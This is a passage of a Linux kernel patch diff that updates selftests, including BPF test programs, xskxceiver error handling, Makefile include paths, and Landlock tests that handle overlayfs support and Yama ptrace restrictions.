+@@ -85,7 +87,7 @@ static void test_kptr_ref(struct map_value *v)
+ 
+ 	p = v->ref_ptr;
+ 	/* store ptr_or_null_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	if (!p)
+ 		return;
+ 	if (p->a + p->b > 100)
+@@ -99,7 +101,7 @@ static void test_kptr_ref(struct map_value *v)
+ 		return;
+ 	}
+ 	/* store ptr_ */
+-	v->unref_ptr = p;
++	WRITE_ONCE(v->unref_ptr, p);
+ 	bpf_kfunc_call_test_release(p);
+ 
+ 	p = bpf_kfunc_call_test_acquire(&(unsigned long){0});
+diff --git a/tools/testing/selftests/bpf/progs/test_bpf_nf.c b/tools/testing/selftests/bpf/progs/test_bpf_nf.c
+index 227e85e85ddaf..9fc603c9d673e 100644
+--- a/tools/testing/selftests/bpf/progs/test_bpf_nf.c
++++ b/tools/testing/selftests/bpf/progs/test_bpf_nf.c
+@@ -34,6 +34,11 @@ __be16 dport = 0;
+ int test_exist_lookup = -ENOENT;
+ u32 test_exist_lookup_mark = 0;
+ 
++enum nf_nat_manip_type___local {
++	NF_NAT_MANIP_SRC___local,
++	NF_NAT_MANIP_DST___local
++};
++
+ struct nf_conn;
+ 
+ struct bpf_ct_opts___local {
+@@ -58,7 +63,7 @@ int bpf_ct_change_timeout(struct nf_conn *, u32) __ksym;
+ int bpf_ct_set_status(struct nf_conn *, u32) __ksym;
+ int bpf_ct_change_status(struct nf_conn *, u32) __ksym;
+ int bpf_ct_set_nat_info(struct nf_conn *, union nf_inet_addr *,
+-			int port, enum nf_nat_manip_type) __ksym;
++			int port, enum nf_nat_manip_type___local) __ksym;
+ 
+ static __always_inline void
+ nf_ct_test(struct nf_conn *(*lookup_fn)(void *, struct bpf_sock_tuple *, u32,
+@@ -157,10 +162,10 @@ nf_ct_test(struct nf_conn *(*lookup_fn)(void *, struct bpf_sock_tuple *, u32,
+ 
+ 		/* snat */
+ 		saddr.ip = bpf_get_prandom_u32();
+-		bpf_ct_set_nat_info(ct, &saddr, sport, NF_NAT_MANIP_SRC);
++		bpf_ct_set_nat_info(ct, &saddr, sport, NF_NAT_MANIP_SRC___local);
+ 		/* dnat */
+ 		daddr.ip = bpf_get_prandom_u32();
+-		bpf_ct_set_nat_info(ct, &daddr, dport, NF_NAT_MANIP_DST);
++		bpf_ct_set_nat_info(ct, &daddr, dport, NF_NAT_MANIP_DST___local);
+ 
+ 		ct_ins = bpf_ct_insert_entry(ct);
+ 		if (ct_ins) {
+diff --git a/tools/testing/selftests/bpf/xdp_synproxy.c b/tools/testing/selftests/bpf/xdp_synproxy.c
+index 410a1385a01dd..6dbe0b7451985 100644
+--- a/tools/testing/selftests/bpf/xdp_synproxy.c
++++ b/tools/testing/selftests/bpf/xdp_synproxy.c
+@@ -116,6 +116,7 @@ static void parse_options(int argc, char *argv[], unsigned int *ifindex, __u32 *
+ 	*tcpipopts = 0;
+ 	*ports = NULL;
+ 	*single = false;
++	*tc = false;
+ 
+ 	while (true) {
+ 		int opt;
+diff --git a/tools/testing/selftests/bpf/xskxceiver.c b/tools/testing/selftests/bpf/xskxceiver.c
+index 681a5db80dae0..8d5d9b94b020b 100644
+--- a/tools/testing/selftests/bpf/xskxceiver.c
++++ b/tools/testing/selftests/bpf/xskxceiver.c
+@@ -350,7 +350,7 @@ static bool ifobj_zc_avail(struct ifobject *ifobject)
+ 	umem = calloc(1, sizeof(struct xsk_umem_info));
+ 	if (!umem) {
+ 		munmap(bufs, umem_sz);
+-		exit_with_error(-ENOMEM);
++		exit_with_error(ENOMEM);
+ 	}
+ 	umem->frame_size = XSK_UMEM__DEFAULT_FRAME_SIZE;
+ 	ret = xsk_configure_umem(umem, bufs, umem_sz);
+@@ -767,7 +767,7 @@ static void pkt_dump(void *pkt, u32 len)
+ 	struct ethhdr *ethhdr;
+ 	struct udphdr *udphdr;
+ 	struct iphdr *iphdr;
+-	int payload, i;
++	u32 payload, i;
+ 
+ 	ethhdr = pkt;
+ 	iphdr = pkt + sizeof(*ethhdr);
+@@ -792,7 +792,7 @@ static void pkt_dump(void *pkt, u32 len)
+ 	fprintf(stdout, "DEBUG>> L4: udp_hdr->src: %d\n", ntohs(udphdr->source));
+ 	fprintf(stdout, "DEBUG>> L4: udp_hdr->dst: %d\n", ntohs(udphdr->dest));
+ 	/*extract L5 frame */
+-	payload = *((uint32_t *)(pkt + PKT_HDR_SIZE));
++	payload = ntohl(*((u32 *)(pkt + PKT_HDR_SIZE)));
+ 
+ 	fprintf(stdout, "DEBUG>> L5: payload: %d\n", payload);
+ 	fprintf(stdout, "---------------------------------------\n");
+@@ -936,7 +936,7 @@ static int receive_pkts(struct test_spec *test, struct pollfd *fds)
+ 		if (ifobj->use_poll) {
+ 			ret = poll(fds, 1, POLL_TMOUT);
+ 			if (ret < 0)
+-				exit_with_error(-ret);
++				exit_with_error(errno);
+ 
+ 			if (!ret) {
+ 				if (!is_umem_valid(test->ifobj_tx))
+@@ -963,7 +963,7 @@ static int receive_pkts(struct test_spec *test, struct pollfd *fds)
+ 				if (xsk_ring_prod__needs_wakeup(&umem->fq)) {
+ 					ret = poll(fds, 1, POLL_TMOUT);
+ 					if (ret < 0)
+-						exit_with_error(-ret);
++						exit_with_error(errno);
+ 				}
+ 				ret = xsk_ring_prod__reserve(&umem->fq, rcvd, &idx_fq);
+ 			}
+@@ -1014,7 +1014,7 @@ static int __send_pkts(struct ifobject *ifobject, u32 *pkt_nb, struct pollfd *fd
+ 			if (timeout) {
+ 				if (ret < 0) {
+ 					ksft_print_msg("ERROR: [%s] Poll error %d\n",
+-						       __func__, ret);
++						       __func__, errno);
+ 					return TEST_FAILURE;
+ 				}
+ 				if (ret == 0)
+@@ -1023,7 +1023,7 @@ static int __send_pkts(struct ifobject *ifobject, u32 *pkt_nb, struct pollfd *fd
+ 			}
+ 			if (ret <= 0) {
+ 				ksft_print_msg("ERROR: [%s] Poll error %d\n",
+-					       __func__, ret);
++					       __func__, errno);
+ 				return TEST_FAILURE;
+ 			}
+ 		}
+@@ -1322,18 +1322,18 @@ static void thread_common_ops(struct test_spec *test, struct ifobject *ifobject)
+ 	if (ifobject->xdp_flags & XDP_FLAGS_SKB_MODE) {
+ 		if (opts.attach_mode != XDP_ATTACHED_SKB) {
+ 			ksft_print_msg("ERROR: [%s] XDP prog not in SKB mode\n");
+-			exit_with_error(-EINVAL);
++			exit_with_error(EINVAL);
+ 		}
+ 	} else if (ifobject->xdp_flags & XDP_FLAGS_DRV_MODE) {
+ 		if (opts.attach_mode != XDP_ATTACHED_DRV) {
+ 			ksft_print_msg("ERROR: [%s] XDP prog not in DRV mode\n");
+-			exit_with_error(-EINVAL);
++			exit_with_error(EINVAL);
+ 		}
+ 	}
+ 
+ 	ret = xsk_socket__update_xskmap(ifobject->xsk->xsk, ifobject->xsk_map_fd);
+ 	if (ret)
+-		exit_with_error(-ret);
++		exit_with_error(errno);
+ }
+ 
+ static void *worker_testapp_validate_tx(void *arg)
+@@ -1540,7 +1540,7 @@ static void swap_xsk_resources(struct ifobject *ifobj_tx, struct ifobject *ifobj
+ 
+ 	ret = xsk_socket__update_xskmap(ifobj_rx->xsk->xsk, ifobj_rx->xsk_map_fd);
+ 	if (ret)
+-		exit_with_error(-ret);
++		exit_with_error(errno);
+ }
+ 
+ static void testapp_bpf_res(struct test_spec *test)
+diff --git a/tools/testing/selftests/clone3/Makefile b/tools/testing/selftests/clone3/Makefile
+index 79b19a2863a0b..84832c369a2ea 100644
+--- a/tools/testing/selftests/clone3/Makefile
++++ b/tools/testing/selftests/clone3/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -g -std=gnu99 -I../../../../usr/include/
++CFLAGS += -g -std=gnu99 $(KHDR_INCLUDES)
+ LDLIBS += -lcap
+ 
+ TEST_GEN_PROGS := clone3 clone3_clear_sighand clone3_set_tid \
+diff --git a/tools/testing/selftests/core/Makefile b/tools/testing/selftests/core/Makefile
+index f6f2d6f473c6a..ce262d0972699 100644
+--- a/tools/testing/selftests/core/Makefile
++++ b/tools/testing/selftests/core/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -g -I../../../../usr/include/
++CFLAGS += -g $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := close_range_test
+ 
+diff --git a/tools/testing/selftests/dmabuf-heaps/Makefile b/tools/testing/selftests/dmabuf-heaps/Makefile
+index 604b43ece15f5..9e7e158d5fa32 100644
+--- a/tools/testing/selftests/dmabuf-heaps/Makefile
++++ b/tools/testing/selftests/dmabuf-heaps/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-CFLAGS += -static -O3 -Wl,-no-as-needed -Wall
++CFLAGS += -static -O3 -Wl,-no-as-needed -Wall $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS = dmabuf-heap
+ 
+diff --git a/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c b/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
+index 29af27acd40ea..890a8236a8ba7 100644
+--- a/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
++++ b/tools/testing/selftests/dmabuf-heaps/dmabuf-heap.c
+@@ -13,10 +13,9 @@
+ #include <sys/types.h>
+ 
+ #include <linux/dma-buf.h>
++#include <linux/dma-heap.h>
+ #include <drm/drm.h>
+ 
+-#include "../../../../include/uapi/linux/dma-heap.h"
+-
+ #define DEVPATH "/dev/dma_heap"
+ 
+ static int check_vgem(int fd)
+diff --git a/tools/testing/selftests/drivers/dma-buf/Makefile b/tools/testing/selftests/drivers/dma-buf/Makefile
+index 79cb16b4e01a9..441407bb0e801 100644
+--- a/tools/testing/selftests/drivers/dma-buf/Makefile
++++ b/tools/testing/selftests/drivers/dma-buf/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -I../../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := udmabuf
+ 
+diff --git a/tools/testing/selftests/drivers/net/netdevsim/devlink.sh b/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
+index a08c02abde121..7f7d20f222070 100755
+--- a/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
++++ b/tools/testing/selftests/drivers/net/netdevsim/devlink.sh
+@@ -17,6 +17,18 @@ SYSFS_NET_DIR=/sys/bus/netdevsim/devices/$DEV_NAME/net/
+ DEBUGFS_DIR=/sys/kernel/debug/netdevsim/$DEV_NAME/
+ DL_HANDLE=netdevsim/$DEV_NAME
+ 
++wait_for_devlink()
++{
++	"$@" | grep -q $DL_HANDLE
++}
++
++devlink_wait()
++{
++	local timeout=$1
++
++	busywait "$timeout" wait_for_devlink devlink dev
++}
++
+ fw_flash_test()
+ {
+ 	RET=0
+@@ -256,6 +268,9 @@ netns_reload_test()
+ 	ip netns del testns2
+ 	ip netns del testns1
+ 
++	# Wait until netns async cleanup is done.
++	devlink_wait 2000
++
+ 	log_test "netns reload test"
+ }
+ 
+@@ -348,6 +363,9 @@ resource_test()
+ 	ip netns del testns2
+ 	ip netns del testns1
+ 
++	# Wait until netns async cleanup is done.
++	devlink_wait 2000
++
+ 	log_test "resource test"
+ }
+ 
+diff --git a/tools/testing/selftests/drivers/s390x/uvdevice/Makefile b/tools/testing/selftests/drivers/s390x/uvdevice/Makefile
+index 891215a7dc8a1..755d164384c46 100644
+--- a/tools/testing/selftests/drivers/s390x/uvdevice/Makefile
++++ b/tools/testing/selftests/drivers/s390x/uvdevice/Makefile
+@@ -11,10 +11,9 @@ else
+ TEST_GEN_PROGS := test_uvdevice
+ 
+ top_srcdir ?= ../../../../../..
+-khdr_dir = $(top_srcdir)/usr/include
+ LINUX_TOOL_ARCH_INCLUDE = $(top_srcdir)/tools/arch/$(ARCH)/include
+ 
+-CFLAGS += -Wall -Werror -static -I$(khdr_dir) -I$(LINUX_TOOL_ARCH_INCLUDE)
++CFLAGS += -Wall -Werror -static $(KHDR_INCLUDES) -I$(LINUX_TOOL_ARCH_INCLUDE)
+ 
+ include ../../../lib.mk
+ 
+diff --git a/tools/testing/selftests/filesystems/Makefile b/tools/testing/selftests/filesystems/Makefile
+index 129880fb42d34..c647fd6a0446a 100644
+--- a/tools/testing/selftests/filesystems/Makefile
++++ b/tools/testing/selftests/filesystems/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ TEST_GEN_PROGS := devpts_pts
+ TEST_GEN_PROGS_EXTENDED := dnotify_test
+ 
+diff --git a/tools/testing/selftests/filesystems/binderfs/Makefile b/tools/testing/selftests/filesystems/binderfs/Makefile
+index 8af25ae960498..c2f7cef919c04 100644
+--- a/tools/testing/selftests/filesystems/binderfs/Makefile
++++ b/tools/testing/selftests/filesystems/binderfs/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../../usr/include/ -pthread
++CFLAGS += $(KHDR_INCLUDES) -pthread
+ TEST_GEN_PROGS := binderfs_test
+ 
+ binderfs_test: binderfs_test.c ../../kselftest.h ../../kselftest_harness.h
+diff --git a/tools/testing/selftests/filesystems/epoll/Makefile b/tools/testing/selftests/filesystems/epoll/Makefile
+index 78ae4aaf7141a..0788a7dc80042 100644
+--- a/tools/testing/selftests/filesystems/epoll/Makefile
++++ b/tools/testing/selftests/filesystems/epoll/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+-CFLAGS += -I../../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ LDLIBS += -lpthread
+ TEST_GEN_PROGS := epoll_wakeup_test
+ 
+diff --git a/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc b/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc
+index fc1daac7f0668..4f5e8c6651562 100644
+--- a/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc
++++ b/tools/testing/selftests/ftrace/test.d/dynevent/eprobes_syntax_errors.tc
+@@ -22,6 +22,8 @@ check_error 'e:foo/^bar.1 syscalls/sys_enter_openat'	# BAD_EVENT_NAME
+ check_error 'e:foo/bar syscalls/sys_enter_openat arg=^dfd'	# BAD_FETCH_ARG
+ check_error 'e:foo/bar syscalls/sys_enter_openat ^arg=$foo'	# BAD_ATTACH_ARG
+ 
+-check_error 'e:foo/bar syscalls/sys_enter_openat if ^'	# NO_EP_FILTER
++if grep -q '<attached-group>\.<attached-event>.*\[if <filter>\]' README; then
++  check_error 'e:foo/bar syscalls/sys_enter_openat if ^'	# NO_EP_FILTER
++fi
+ 
+ exit 0
+diff --git a/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc b/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
+index 3eea2abf68f9e..2ad7d4b501cc1 100644
+--- a/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
++++ b/tools/testing/selftests/ftrace/test.d/ftrace/func_event_triggers.tc
+@@ -42,7 +42,7 @@ test_event_enabled() {
+ 
+     while [ $check_times -ne 0 ]; do
+ 	e=`cat $EVENT_ENABLE`
+-	if [ "$e" == $val ]; then
++	if [ "$e" = $val ]; then
+ 	    return 0
+ 	fi
+ 	sleep $SLEEP_TIME
+diff --git a/tools/testing/selftests/futex/functional/Makefile b/tools/testing/selftests/futex/functional/Makefile
+index 5a0e0df8de9b3..a392d0917b4e5 100644
+--- a/tools/testing/selftests/futex/functional/Makefile
++++ b/tools/testing/selftests/futex/functional/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0
+-INCLUDES := -I../include -I../../ -I../../../../../usr/include/
++INCLUDES := -I../include -I../../ $(KHDR_INCLUDES)
+ CFLAGS := $(CFLAGS) -g -O2 -Wall -D_GNU_SOURCE -pthread $(INCLUDES) $(KHDR_INCLUDES)
+ LDLIBS := -lpthread -lrt
+ 
+diff --git a/tools/testing/selftests/gpio/Makefile b/tools/testing/selftests/gpio/Makefile
+index 616ed40196554..e0884390447dc 100644
+--- a/tools/testing/selftests/gpio/Makefile
++++ b/tools/testing/selftests/gpio/Makefile
+@@ -3,6 +3,6 @@
+ TEST_PROGS := gpio-mockup.sh gpio-sim.sh
+ TEST_FILES := gpio-mockup-sysfs.sh
+ TEST_GEN_PROGS_EXTENDED := gpio-mockup-cdev gpio-chip-info gpio-line-name
+-CFLAGS += -O2 -g -Wall -I../../../../usr/include/ $(KHDR_INCLUDES)
++CFLAGS += -O2 -g -Wall $(KHDR_INCLUDES)
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/ipc/Makefile b/tools/testing/selftests/ipc/Makefile
+index 1c4448a843a41..50e9c299fc4ae 100644
+--- a/tools/testing/selftests/ipc/Makefile
++++ b/tools/testing/selftests/ipc/Makefile
+@@ -10,7 +10,7 @@ ifeq ($(ARCH),x86_64)
+ 	CFLAGS := -DCONFIG_X86_64 -D__x86_64__
+ endif
+ 
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := msgque
+ 
+diff --git a/tools/testing/selftests/kcmp/Makefile b/tools/testing/selftests/kcmp/Makefile
+index b4d39f6b5124d..59a1e53790181 100644
+--- a/tools/testing/selftests/kcmp/Makefile
++++ b/tools/testing/selftests/kcmp/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -I../../../../usr/include/
++CFLAGS += $(KHDR_INCLUDES)
+ 
+ TEST_GEN_PROGS := kcmp_test
+ 
+diff --git a/tools/testing/selftests/landlock/fs_test.c b/tools/testing/selftests/landlock/fs_test.c
+index 45de42a027c54..f2c3bffa6ea51 100644
+--- a/tools/testing/selftests/landlock/fs_test.c
++++ b/tools/testing/selftests/landlock/fs_test.c
+@@ -11,6 +11,7 @@
+ #include <fcntl.h>
+ #include <linux/landlock.h>
+ #include <sched.h>
++#include <stdio.h>
+ #include <string.h>
+ #include <sys/capability.h>
+ #include <sys/mount.h>
+@@ -87,6 +88,40 @@ static const char dir_s3d3[] = TMP_DIR "/s3d1/s3d2/s3d3";
+  *         └── s3d3
+  */
+ 
++static bool fgrep(FILE *const inf, const char *const str)
++{
++	char line[32];
++	const int slen = strlen(str);
++
++	while (!feof(inf)) {
++		if (!fgets(line, sizeof(line), inf))
++			break;
++		if (strncmp(line, str, slen))
++			continue;
++
++		return true;
++	}
++
++	return false;
++}
++
++static bool supports_overlayfs(void)
++{
++	bool res;
++	FILE *const inf = fopen("/proc/filesystems", "r");
++
++	/*
++	 * Consider that the filesystem is supported if we cannot get the
++	 * supported ones.
++	 */
++	if (!inf)
++		return true;
++
++	res = fgrep(inf, "nodev\toverlay\n");
++	fclose(inf);
++	return res;
++}
++
+ static void mkdir_parents(struct __test_metadata *const _metadata,
+ 			  const char *const path)
+ {
+@@ -3539,6 +3574,9 @@ FIXTURE(layout2_overlay) {};
+ 
+ FIXTURE_SETUP(layout2_overlay)
+ {
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	prepare_layout(_metadata);
+ 
+ 	create_directory(_metadata, LOWER_BASE);
+@@ -3575,6 +3613,9 @@ FIXTURE_SETUP(layout2_overlay)
+ 
+ FIXTURE_TEARDOWN(layout2_overlay)
+ {
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	EXPECT_EQ(0, remove_path(lower_do1_fl3));
+ 	EXPECT_EQ(0, remove_path(lower_dl1_fl2));
+ 	EXPECT_EQ(0, remove_path(lower_fl1));
+@@ -3606,6 +3647,9 @@ FIXTURE_TEARDOWN(layout2_overlay)
+ 
+ TEST_F_FORK(layout2_overlay, no_restriction)
+ {
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	ASSERT_EQ(0, test_open(lower_fl1, O_RDONLY));
+ 	ASSERT_EQ(0, test_open(lower_dl1, O_RDONLY));
+ 	ASSERT_EQ(0, test_open(lower_dl1_fl2, O_RDONLY));
+@@ -3769,6 +3813,9 @@ TEST_F_FORK(layout2_overlay, same_content_different_file)
+ 	size_t i;
+ 	const char *path_entry;
+ 
++	if (!supports_overlayfs())
++		SKIP(return, "overlayfs is not supported");
++
+ 	/* Sets rules on base directories (i.e. outside overlay scope). */
+ 	ruleset_fd = create_ruleset(_metadata, ACCESS_RW, layer1_base);
+ 	ASSERT_LE(0, ruleset_fd);
+diff --git a/tools/testing/selftests/landlock/ptrace_test.c b/tools/testing/selftests/landlock/ptrace_test.c
+index c28ef98ff3ac1..55e7871631a19 100644
+--- a/tools/testing/selftests/landlock/ptrace_test.c
++++ b/tools/testing/selftests/landlock/ptrace_test.c
+@@ -19,6 +19,12 @@
+ 
+ #include "common.h"
+ 
++/* Copied from security/yama/yama_lsm.c */
++#define YAMA_SCOPE_DISABLED 0
++#define YAMA_SCOPE_RELATIONAL 1
++#define YAMA_SCOPE_CAPABILITY 2
++#define YAMA_SCOPE_NO_ATTACH 3
++
+ static void create_domain(struct __test_metadata *const _metadata)
+ {
+ 	int ruleset_fd;
+@@ -60,6 +66,25 @@ static int test_ptrace_read(const pid_t pid)
+ 	return 0;
+ }
+ 
++static int get_yama_ptrace_scope(void)
++{
++	int ret;
++	char buf[2] = {};
++	const int fd = open("/proc/sys/kernel/yama/ptrace_scope", O_RDONLY);
++
++	if (fd < 0)
++		return 0;
++
++	if (read(fd, buf, 1) < 0) {
++		close(fd);
++		return -1;
++	}
++
++	ret = atoi(buf);
++	close(fd);
++	return ret;
++}
++
+ /* clang-format off */
+ FIXTURE(hierarchy) {};
+ /* clang-format on */
+@@ -232,8 +257,51 @@ TEST_F(hierarchy, trace)
+ 	pid_t child, parent;
+ 	int status, err_proc_read;
+ 	int pipe_child[2], pipe_parent[2];
++	int yama_ptrace_scope;
+ 	char buf_parent;
+ 	long ret;
++	bool can_read_child, can_trace_child, can_read_parent, can_trace_parent;
++
++	yama_ptrace_scope = get_yama_ptrace_scope();
++	ASSERT_LE(0, yama_ptrace_scope);
++
++	if (yama_ptrace_scope > YAMA_SCOPE_DISABLED)
++		TH_LOG("Incomplete tests due to Yama restrictions (scope %d)",
++		       yama_ptrace_scope);
++
++	/*
++	 * can_read_child is true if a parent process can read its child
++	 * process, which is only the case when the parent process is not
++	 * isolated from the child with a dedicated Landlock domain.
++	 */
++	can_read_child = !variant->domain_parent;
++
++	/*
++	 * can_trace_child is true if a parent process can trace its child
++	 * process.  This depends on two conditions:
++	 * - The parent process is not isolated from the child with a dedicated
++	 *   Landlock domain.
++	 * - Yama allows tracing children (up to YAMA_SCOPE_RELATIONAL).
++	 */
++	can_trace_child = can_read_child &&
++			  yama_ptrace_scope <= YAMA_SCOPE_RELATIONAL;
++
++	/*
++	 * can_read_parent is true if a child process can read its parent
++	 * process, which is only the case when the child process is not
++	 * isolated from the parent with a dedicated Landlock domain.
++	 */
++	can_read_parent = !variant->domain_child;
++
++	/*
++	 * can_trace_parent is true if a child process can trace its parent
++	 * process.  This depends on two conditions:
++	 * - The child process is not isolated from the parent with a dedicated
++	 *   Landlock domain.
++	 * - Yama is disabled (YAMA_SCOPE_DISABLED).
++	 */
++	can_trace_parent = can_read_parent &&
++			   yama_ptrace_scope <= YAMA_SCOPE_DISABLED;
+ 
+ 	/*
+ 	 * Removes all effective and permitted capabilities to not interfere
+@@ -264,16 +332,21 @@ TEST_F(hierarchy, trace)
+ 		/* Waits for the parent to be in a domain, if any. */
+ 		ASSERT_EQ(1, read(pipe_parent[0], &buf_child, 1));
+ 
+-		/* Tests PTRACE_ATTACH and PTRACE_MODE_READ on the parent. */
++		/* Tests PTRACE_MODE_READ on the parent. */
+ 		err_proc_read = test_ptrace_read(parent);
++		if (can_read_parent) {
++			EXPECT_EQ(0, err_proc_read);
++		} else {
++			EXPECT_EQ(EACCES, err_proc_read);
++		}
++
++		/* Tests PTRACE_ATTACH on the parent. */
+ 		ret = ptrace(PTRACE_ATTACH, parent, NULL, 0);
+-		if (variant->domain_child) {
++		if (can_trace_parent) {
++			EXPECT_EQ(0, ret);
++		} else {
+ 			EXPECT_EQ(-1, ret);
+ 			EXPECT_EQ(EPERM, errno);
+-			EXPECT_EQ(EACCES, err_proc_read);
+-		} else {
+-			EXPECT_EQ(0, ret);
+-			EXPECT_EQ(0, err_proc_read);
+ 		}
+ 		if (ret == 0) {
+ 			ASSERT_EQ(parent, waitpid(parent, &status, 0));
+@@ -283,11 +356,11 @@ TEST_F(hierarchy, trace)
+ 
+ 		/* Tests child PTRACE_TRACEME. */
+ 		ret = ptrace(PTRACE_TRACEME);
+-		if (variant->domain_parent) {
++		if (can_trace_child) {
++			EXPECT_EQ(0, ret);
++		} else {
+ 			EXPECT_EQ(-1, ret);
+ 			EXPECT_EQ(EPERM, errno);
+-		} else {
+-			EXPECT_EQ(0, ret);
+ 		}
+ 
+ 		/*
+@@ -296,7 +369,7 @@ TEST_F(hierarchy, trace)
+ 		 */
+ 		ASSERT_EQ(1, write(pipe_child[1], ".", 1));
+ 
+-		if (!variant->domain_parent) {
++		if (can_trace_child) {
+ 			ASSERT_EQ(0, raise(SIGSTOP));
+ 		}
+ 
+@@ -321,7 +394,7 @@ TEST_F(hierarchy, trace)
+ 	ASSERT_EQ(1, read(pipe_child[0], &buf_parent, 1));
+ 
+ 	/* Tests child PTRACE_TRACEME. */
+-	if (!variant->domain_parent) {
++	if (can_trace_child) {
+ 		ASSERT_EQ(child, waitpid(child, &status, 0));
+ 		ASSERT_EQ(1, WIFSTOPPED(status));
+ 		ASSERT_EQ(0, ptrace(PTRACE_DETACH, child, NULL, 0));
+@@ -331,17 +404,23 @@ TEST_F(hierarchy, trace)
+ 		EXPECT_EQ(ESRCH, errno);
+ 	}
+ 
+-	/* Tests PTRACE_ATTACH and PTRACE_MODE_READ on the child. */
++	/* Tests PTRACE_MODE_READ on the child. */
+ 	err_proc_read = test_ptrace_read(child);
++	if (can_read_child) {
++		EXPECT_EQ(0, err_proc_read);
++	} else {
++		EXPECT_EQ(EACCES, err_proc_read);
++	}
++
++	/* Tests PTRACE_ATTACH on the child. */
+ 	ret = ptrace(PTRACE_ATTACH, child, NULL, 0);
+-	if (variant->domain_parent) {
++	if (can_trace_child) {
++		EXPECT_EQ(0, ret);
++	} else {
+ 		EXPECT_EQ(-1, ret);
+ 		EXPECT_EQ(EPERM, errno);
+-		EXPECT_EQ(EACCES, err_proc_read);
+-	} else {
+-		EXPECT_EQ(0, ret);
+-		EXPECT_EQ(0, err_proc_read);
+ 	}
++
+ 	if (ret == 0) {
+ 		ASSERT_EQ(child, waitpid(child, &status, 0));
+ 		ASSERT_EQ(1, WIFSTOPPED(status));
+diff --git a/tools/testing/selftests/media_tests/Makefile b/tools/testing/selftests/media_tests/Makefile
+index 60826d7d37d49..471d83e61d95e 100644
+--- a/tools/testing/selftests/media_tests/Makefile
++++ b/tools/testing/selftests/media_tests/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ #
+-CFLAGS += -I../ -I../../../../usr/include/
++CFLAGS += -I../ $(KHDR_INCLUDES)
+ TEST_GEN_PROGS := media_device_test media_device_open video_device_test
+ 
+ include ../lib.mk
+diff --git a/tools/testing/selftests/membarrier/Makefile b/tools/testing/selftests/membarrier/Makefile
+index 34d1c81a2324a..fc840e06ff565 100644
+--- a/tools/testing/selftests/membarrier/Makefile
++++ b/tools/testing/selftests/membarrier/Makefile
+@@ -1,5 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+-CFLAGS += -g -I../../../../usr/include/
++CFLAGS += -g $(KHDR_INCLUDES)
+ LDLIBS += -lpthread
+ 
+ TEST_GEN_PROGS := membarrier_test_single_thread \
+diff --git a/tools/testing/selftests/mount_setattr/Makefile b/tools/testing/selftests/mount_setattr/Makefile
+index 2250f7dcb81e3..fde72df01b118 100644
+--- a/tools/testing/selftests/mount_setattr/Makefile
++++ b/tools/testing/selftests/mount_setattr/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ # Makefile for mount selftests.
+-CFLAGS = -g -I../../../../usr/include/ -Wall -O2 -pthread
++CFLAGS = -g $(KHDR_INCLUDES) -Wall -O2 -pthread
+ 
+ TEST_GEN_FILES += mount_setattr_test
+ 
+diff --git a/tools/testing/selftests/move_mount_set_group/Makefile b/tools/testing/selftests/move_mount_set_group/Makefile
+index 80c2d86812b06..94235846b6f9b 100644
+--- a/tools/testing/selftests/move_mount_set_group/Makefile
++++ b/tools/testing/selftests/move_mount_set_group/Makefile
+@@ -1,6 +1,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ # Makefile for mount selftests.
+-CFLAGS = -g -I../../../../usr/include/ -Wall -O2
++CFLAGS = -g $(KHDR_INCLUDES) -Wall -O2
+ 
+ TEST_GEN_FILES += move_mount_set_group_test
+ 
+diff --git a/tools/testing/selftests/net/fib_tests.sh b/tools/testing/selftests/net/fib_tests.sh
+index 5637b5dadabdb..70ea8798b1f60 100755
+--- a/tools/testing/selftests/net/fib_tests.sh
++++ b/tools/testing/selftests/net/fib_tests.sh
+@@ -2065,6 +2065,8 @@ EOF
+ ################################################################################
+ # main
+ 
++trap cleanup EXIT
++
+ while getopts :t:pPhv o
+ do
+ 	case $o in
+diff --git a/tools/testing/selftests/net/udpgso_bench_rx.c b/tools/testing/selftests/net/udpgso_bench_rx.c
+index 4058c7451e70d..f35a924d4a303 100644
